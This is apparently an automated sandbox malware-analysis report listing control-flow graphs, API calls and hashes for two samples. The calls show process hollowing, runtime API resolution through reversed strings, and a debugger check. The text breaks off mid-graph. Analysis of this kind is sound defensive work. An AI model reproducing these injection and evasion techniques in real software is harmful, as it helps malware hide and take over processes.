29397 2cba728 29396->29397 29398 2cb894c 3 API calls 29397->29398 29399 2cba73c 29398->29399 29400 2cb894c 3 API calls 29399->29400 29401 2cba78e 29400->29401 29402 2cb894c 3 API calls 29401->29402 29403 2cba7e0 29402->29403 29404 2cb894c 3 API calls 29403->29404 29405 2cba832 29404->29405 29406 2cb894c 3 API calls 29405->29406 29407 2cba884 29406->29407 29408 2cb894c 3 API calls 29407->29408 29409 2cba8a3 29408->29409 29410 2cb894c 3 API calls 29409->29410 29410->29261 29411->28747 29412->28900 29413->28828 29414->28981 29415->29041 29416->28959 29417->29014 29419 2cb8965 29418->29419 29420 2cb89a5 29419->29420 29421 2cb7d78 3 API calls 29419->29421 29420->29115 29421->29420 29423 2cb835b 29422->29423 29424 2cb81cc 2 API calls 29423->29424 29425 2cb838d 29424->29425 29426 2cb8274 GetProcAddress 29425->29426 29427 2cb8393 FlushInstructionCache 29426->29427 29428 2cb83c1 29427->29428 29428->29229 29430 2cb8299 29429->29430 29431 2cb82cc GetProcAddress 29430->29431 29432 2cb82fb 29431->29432 29432->29238 29434 2cb7d9d 29433->29434 29440 2cb81cc 29434->29440 29436 2cb7dcd 29437 2cb8274 GetProcAddress 29436->29437 29438 2cb7dd3 NtWriteVirtualMemory 29437->29438 29439 2cb7e0c 29438->29439 29439->29240 29441 2cb81ef 29440->29441 29442 2cb8274 GetProcAddress 29441->29442 29443 2cb8215 GetModuleHandleA 29442->29443 29444 2cb823b 29443->29444 29444->29436 29446 2cb87ab 29445->29446 29447 2cb81cc 2 API calls 29446->29447 29448 2cb87dd 29447->29448 29449 2cb8274 GetProcAddress 29448->29449 29450 2cb87e3 CreateProcessAsUserW 29449->29450 29451 2cb882f 29450->29451 29451->29281 29453 2cb8425 29452->29453 29454 2cb81cc 2 API calls 29453->29454 29455 2cb8452 29454->29455 29456 2cb8274 GetProcAddress 29455->29456 29457 2cb8458 NtReadVirtualMemory 29456->29457 29458 2cb8493 29457->29458 29458->29309 29460 2cb8695 29459->29460 29461 2cb81cc 2 API calls 29460->29461 29462 2cb86c2 29461->29462 29463 2cb8274 GetProcAddress 29462->29463 29464 2cb86c8 NtUnmapViewOfSection 29463->29464 29465 2cb86f5 29464->29465 29465->29324 29467 2cb7a2a 29466->29467 29467->29466 29468 2cb81cc 2 API calls 29467->29468 29469 2cb7a7e 29468->29469 29470 2cb8274 GetProcAddress 29469->29470 29471 2cb7a84 NtAllocateVirtualMemory 29470->29471 29472 2cb7ac2 29471->29472 29472->29333

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 12890 2cb7ac9 12891 2cb7a56 12890->12891 12892 2cb7a2a-2cb7a54 call 2ca4530 12891->12892 12893 2cb7a58-2cb7ac2 call 2cb798c call 2ca47ec call 2ca49a0 call 2cb81cc call 2cb8274 NtAllocateVirtualMemory call 2ca4500 12891->12893 12892->12891
                                                                                                                    APIs
                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CB7A9F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                    • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                    • API String ID: 2167126740-445027087
                                                                                                                    • Opcode ID: 50af5b5dbbe4f76d754942118c7c39037276d34b8ca209a94f18f7fc5c274659
                                                                                                                    • Instruction ID: 487dd44f69d4b8965a7ca238ba70fe97d7265f3d83f42a73ebaa1e1d63dce034
                                                                                                                    • Opcode Fuzzy Hash: 50af5b5dbbe4f76d754942118c7c39037276d34b8ca209a94f18f7fc5c274659
                                                                                                                    • Instruction Fuzzy Hash: BE117076680208BFEB25EFA4DC61EEAB7EDEF89700F415460BD01D7240D670AE08DB24

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                      • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CB7A9F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                    • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                    • API String ID: 421316089-445027087
                                                                                                                    • Opcode ID: 7e9c4ab81529a1ccad183d7a8cbd9d3c6122d00dbe6bf200e5637b0b1ba31890
                                                                                                                    • Instruction ID: d35e43cdf6519915d983e7f9901a29b4ce7696426111a01c7dc7277a1d43c370
                                                                                                                    • Opcode Fuzzy Hash: 7e9c4ab81529a1ccad183d7a8cbd9d3c6122d00dbe6bf200e5637b0b1ba31890
                                                                                                                    • Instruction Fuzzy Hash: 27115B75680209BFEB25EFA4DD61EEEB7AEEF89700F414460B900D7240D670AE14DB20

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 12927 2cb7a2c-2cb7a47 12928 2cb7a4c-2cb7a56 call 2ca4530 12927->12928 12931 2cb7a2a 12928->12931 12932 2cb7a58-2cb7a7f call 2cb798c call 2ca47ec call 2ca49a0 call 2cb81cc call 2cb8274 12928->12932 12931->12927 12942 2cb7a84-2cb7ac2 NtAllocateVirtualMemory call 2ca4500 12932->12942
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                      • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                    • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CB7A9F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                    • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                                                    • API String ID: 421316089-445027087
                                                                                                                    • Opcode ID: 0ac21f7c044637a8f59857398534d6e7ae7a3eb62eec21104754e211ca6c078f
                                                                                                                    • Instruction ID: 84b77c6e4943d351f108c9773cee7175bc14f13f2108fb4c312efa49b46ba51b
                                                                                                                    • Opcode Fuzzy Hash: 0ac21f7c044637a8f59857398534d6e7ae7a3eb62eec21104754e211ca6c078f
                                                                                                                    • Instruction Fuzzy Hash: A3116D75680209BFEB25EFA4DD61EDEB7AEEF89700F414460B900D7240D670AE14DB20

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                      • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                    • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CB8471
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleMemoryModuleProcReadVirtual
                                                                                                                    • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                                                    • API String ID: 2004920654-737317276
                                                                                                                    • Opcode ID: 12f669d2bc61d5b7c3110f7f602bfbbc652fc478493bc090cf1cc3486d293ac7
                                                                                                                    • Instruction ID: 9a8718512f8b517b0c54e90fba0b406d5f4d4b6984f2880420b82635de85b9a5
                                                                                                                    • Opcode Fuzzy Hash: 12f669d2bc61d5b7c3110f7f602bfbbc652fc478493bc090cf1cc3486d293ac7
                                                                                                                    • Instruction Fuzzy Hash: AE016579640208AFEB25EFA8DC61E9AB7EEFB48704F514420F904D7340D674AD10DF24

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                      • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                    • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CB7DEC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                                                                                                    • String ID: Ntdll$yromeMlautriVetirW
                                                                                                                    • API String ID: 4260932595-3542721025
                                                                                                                    • Opcode ID: 2592f8a6a1b24e5333b5cf9db3f2ad08e08c475c17afd04e37993544ef88ff99
                                                                                                                    • Instruction ID: 78d1a974077c55c2e075d1905afcd4a12206ab91b818e76c7dec468578bff531
                                                                                                                    • Opcode Fuzzy Hash: 2592f8a6a1b24e5333b5cf9db3f2ad08e08c475c17afd04e37993544ef88ff99
                                                                                                                    • Instruction Fuzzy Hash: 3C012D7A640289AFEB25EF98DC51E9EB7EDEF89700F514460B800D7640D670AD14DB64

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                      • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 02CB86D5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProcSectionUnmapView
                                                                                                                    • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                    • API String ID: 2801472262-2520021413
                                                                                                                    • Opcode ID: 7a9418b01dd617dbe218b12990fe261df4a93043dc83ccf949640be9fe1cbd81
                                                                                                                    • Instruction ID: 739748ca6199268125a6eadeeb574ff6aabdb07454edfd07f0b6b4aa2a1ffccd
                                                                                                                    • Opcode Fuzzy Hash: 7a9418b01dd617dbe218b12990fe261df4a93043dc83ccf949640be9fe1cbd81
                                                                                                                    • Instruction Fuzzy Hash: 69016D74A40208AFEB25EFB4DD61E9EB7EEEF89B14F514560B800E7640DA74AD04DA24

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                      • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                    • NtUnmapViewOfSection.NTDLL(?,?), ref: 02CB86D5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProcSectionUnmapView
                                                                                                                    • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                                                    • API String ID: 2801472262-2520021413
                                                                                                                    • Opcode ID: 1005b97fdbeb7413325a6032d6deba5ec490aa3b6a6e1067d61e308ef06e9359
                                                                                                                    • Instruction ID: bb059f94d450ff01da575111411e77965e7c9cb6c01599880433dd25e394d74e
                                                                                                                    • Opcode Fuzzy Hash: 1005b97fdbeb7413325a6032d6deba5ec490aa3b6a6e1067d61e308ef06e9359
                                                                                                                    • Instruction Fuzzy Hash: A7F04939A40209EFEB15FFB4E9509DDB7EEEF89314F5145A1A44497600DA30AE04DF10

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                      • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                    • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CB8814
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressCreateHandleModuleProcProcessUser
                                                                                                                    • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                    • API String ID: 4105707577-2353454454
                                                                                                                    • Opcode ID: 7d6395fb8d621c3ee682f035fe96d94f4ef243f8ee8a7718d96e24be1cb092c8
                                                                                                                    • Instruction ID: b184ac1baf577caab1b03594f22592a6b9b9590eab133f6cef23aa0fa1c8e71e
                                                                                                                    • Opcode Fuzzy Hash: 7d6395fb8d621c3ee682f035fe96d94f4ef243f8ee8a7718d96e24be1cb092c8
                                                                                                                    • Instruction Fuzzy Hash: D711E2B2640248AFEB61EFA8DD91FDA77EDEF0C704F514520BA08E7200C674ED109B25

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 13006 2cbf744-2cbf75e call 2ca668c 13009 2cbf78a-2cbf792 13006->13009 13010 2cbf760-2cbf772 call 2ca6694 13006->13010 13010->13009 13013 2cbf774-2cbf784 CheckRemoteDebuggerPresent 13010->13013 13013->13009 13014 2cbf786 13013->13014 13014->13009
                                                                                                                    APIs
                                                                                                                    • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CBF77D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                    • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                    • API String ID: 3662101638-539270669
                                                                                                                    • Opcode ID: d356e1df88ea7236b562fe63c2ca346a00acf93885edb1f389e2a97c88714d53
                                                                                                                    • Instruction ID: 9068f52313cf04630e4c1d7f48903d5217e9df65c7e1d7e9715cc46603e5a760
                                                                                                                    • Opcode Fuzzy Hash: d356e1df88ea7236b562fe63c2ca346a00acf93885edb1f389e2a97c88714d53
                                                                                                                    • Instruction Fuzzy Hash: 1CF0A77190424CBAEB11A6F98C887DCFBBD5F05329F2443D8B435B2AD1E7710740CA91
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02CB81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                      • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                    • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CB83C2), ref: 02CB83A4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressCacheFlushHandleInstructionModuleProc
                                                                                                                    • String ID: FlushInstructionCache$Kernel32
                                                                                                                    • API String ID: 2392256011-184458249
                                                                                                                    • Opcode ID: f0374d4dcd1ef4eaccc6c24b96cb1df425240d85ba9e50458366dbf101e99cc6
                                                                                                                    • Instruction ID: 067961a0e7cce3a66ec7a916f8cf384186fc55d6909c03e76ea6128a29291d8f
                                                                                                                    • Opcode Fuzzy Hash: f0374d4dcd1ef4eaccc6c24b96cb1df425240d85ba9e50458366dbf101e99cc6
                                                                                                                    • Instruction Fuzzy Hash: 7D016975784348AFEB26EFA4DC62F9AB7EEEB08B00F514460B904D6740D6B0AD149F25
                                                                                                                    APIs
                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc
                                                                                                                    • String ID: Kernel32$sserddAcorPteG
                                                                                                                    • API String ID: 190572456-1372893251
                                                                                                                    • Opcode ID: ed1b73c700f35fdecc1ef666008f29b0116891ea81da4e6e9f17a6fa04cd6094
                                                                                                                    • Instruction ID: b64e41fb3fd22123c87680a9d816b1db0dfcf516df3717620b9116deefb36234
                                                                                                                    • Opcode Fuzzy Hash: ed1b73c700f35fdecc1ef666008f29b0116891ea81da4e6e9f17a6fa04cd6094
                                                                                                                    • Instruction Fuzzy Hash: 17016D75A40309AFEB25EFA4DC61E9EB7EEEB48B04F514460B805D7740DA70AD04DE68
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02CB8274: GetProcAddress.KERNEL32(?,?), ref: 02CB82D9
                                                                                                                    • GetModuleHandleA.KERNELBASE(?), ref: 02CB821E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000019.00000002.2272785634.0000000002CA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_25_2_2ca1000_Wisrysxl.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                    • API String ID: 1646373207-1952140341
                                                                                                                    • Opcode ID: 07ed17d8420c9e6ebcf29ebd8cf6512b062f31e25bdd3c980be16004a988f261
                                                                                                                    • Instruction ID: 4d2158d97946b4596082ce787f036043b811fad725a13a3497fac4afa0c767b2
                                                                                                                    • Opcode Fuzzy Hash: 07ed17d8420c9e6ebcf29ebd8cf6512b062f31e25bdd3c980be16004a988f261
                                                                                                                    • Instruction Fuzzy Hash: F7F09670E44704AFFB26EFB4DD1199AB7EDFB49700B514570B810C3750D670AE14D925

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:27.8%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:32
                                                                                                                    Total number of Limit Nodes:2

                                                                                                                    Callgraph

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000001.2242349420.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000001A.00000001.2242349420.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001A.00000001.2242349420.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_1_400000_lxsyrsiW.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                    • String ID: %s\%s
                                                                                                                    • API String ID: 2742963760-4073750446
                                                                                                                    • Opcode ID: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                    • Instruction ID: 7e0938a0f735226449982c757e1a15bee8303af7c1bff0ef3dea70518ca31291
                                                                                                                    • Opcode Fuzzy Hash: f7caa40db87bd64da8a9641d8fb3409a5fd547f57c718ebec707670eae309403
                                                                                                                    • Instruction Fuzzy Hash: 9971F4F1E001049BDB54DB9CDC81B9E77B9DB48309F04417AF60AFB391E639AA448B59

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000001.2242349420.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000001A.00000001.2242349420.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001A.00000001.2242349420.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_1_400000_lxsyrsiW.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2992075992-0
                                                                                                                    • Opcode ID: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                    • Instruction ID: da6ba3fb88c20024e61c29d0d1421e634aa01f37861d58f563f893074dd25450
                                                                                                                    • Opcode Fuzzy Hash: 9d440d4ec79179d813846289a69e97d5325691e0c2bdd9780b26e9bc1f5c1949
                                                                                                                    • Instruction Fuzzy Hash: F54135F0E101049BDB58DB58DC91B9D77B9DB44309F0441BAF60AFB391E63CAA88CB59

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000001.2242349420.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000001A.00000001.2242349420.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001A.00000001.2242349420.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_1_400000_lxsyrsiW.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __getmainargs__set_app_type_controlfpexitmemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1611591150-0
                                                                                                                    • Opcode ID: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                    • Instruction ID: 9bdd3bf799432f41f787d58fcaaf5403f241b1bf87296188f28308fcf3b5ab6f
                                                                                                                    • Opcode Fuzzy Hash: 3e9f39bb6ffd838578539124f816f781f8a913f6e0aece3818f3f62b9f724f52
                                                                                                                    • Instruction Fuzzy Hash: CA110CF5E00104AFCB01EBB8EC85F4A77ACA74C304F50447AB909E7361E979EA448769

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 25 401000-40102e malloc 26 401031-401039 25->26 27 401087-40108b 26->27 28 40103f-401085 26->28 28->26
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv, xrefs: 0040106E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000001.2242349420.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000001A.00000001.2242349420.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001A.00000001.2242349420.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_1_400000_lxsyrsiW.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: malloc
                                                                                                                    • String ID: j+s9ha:h4p,hw@i*w-.twyn9k7[kazbv
                                                                                                                    • API String ID: 2803490479-2443507578
                                                                                                                    • Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                    • Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
                                                                                                                    • Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
                                                                                                                    • Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 31 4013ff-401452 call 401358 call 40108c call 4013b4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001A.00000001.2242349420.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000001A.00000001.2242349420.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001A.00000001.2242349420.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_26_1_400000_lxsyrsiW.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$EntryPointfopenstrcmpstrcpy
                                                                                                                    • String ID: D`:vD`:v$D`:vD`:v
                                                                                                                    • API String ID: 4108700736-3916433284
                                                                                                                    • Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                    • Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
                                                                                                                    • Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                    • Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:15%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:3
                                                                                                                    Total number of Limit Nodes:0
                                                                                                                    execution_graph 24238 27defe8 24239 27df036 GlobalMemoryStatusEx 24238->24239 24240 27df066 24239->24240

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 920 6427e78-6427e96 921 6427e98-6427e9b 920->921 922 6427eb2-6427eb5 921->922 923 6427e9d-6427eab 921->923 924 6427ec2-6427ec5 922->924 925 6427eb7-6427ec1 922->925 929 6427f1e-6427f34 923->929 930 6427ead 923->930 927 6427ec7-6427ee3 924->927 928 6427ee8-6427eeb 924->928 927->928 931 6427f0c-6427f0e 928->931 932 6427eed-6427f07 928->932 939 6427f3a-6427f43 929->939 940 642814f-6428159 929->940 930->922 933 6427f10 931->933 934 6427f15-6427f18 931->934 932->931 933->934 934->921 934->929 942 642815a-642818f 939->942 943 6427f49-6427f66 939->943 946 6428191-6428194 942->946 952 642813c-6428149 943->952 953 6427f6c-6427f94 943->953 948 642819a-64281a9 946->948 949 64283c9-64283cc 946->949 961 64281ab-64281c6 948->961 962 64281c8-642820c 948->962 950 64283ce-64283ea 949->950 951 64283ef-64283f2 949->951 950->951 954 64283f8-6428404 951->954 955 642849d-642849f 951->955 952->939 952->940 953->952 973 6427f9a-6427fa3 953->973 964 642840f-6428411 954->964 958 64284a1 955->958 959 64284a6-64284a9 955->959 958->959 959->946 963 64284af-64284b8 959->963 961->962 971 6428212-6428223 962->971 972 642839d-64283b3 962->972 968 6428413-6428419 964->968 969 6428429-642842d 964->969 974 642841b 968->974 975 642841d-642841f 968->975 976 642843b 969->976 977 642842f-6428439 969->977 985 6428388-6428397 971->985 986 6428229-6428246 971->986 972->949 973->942 980 6427fa9-6427fc5 973->980 974->969 975->969 979 6428440-6428442 976->979 977->979 983 6428453-642848c 979->983 984 6428444-6428447 979->984 990 642812a-6428136 980->990 991 6427fcb-6427ff5 980->991 983->948 1003 6428492-642849c 983->1003 984->963 985->971 985->972 986->985 998 642824c-6428342 call 6426698 986->998 990->952 990->973 1004 6428120-6428125 991->1004 1005 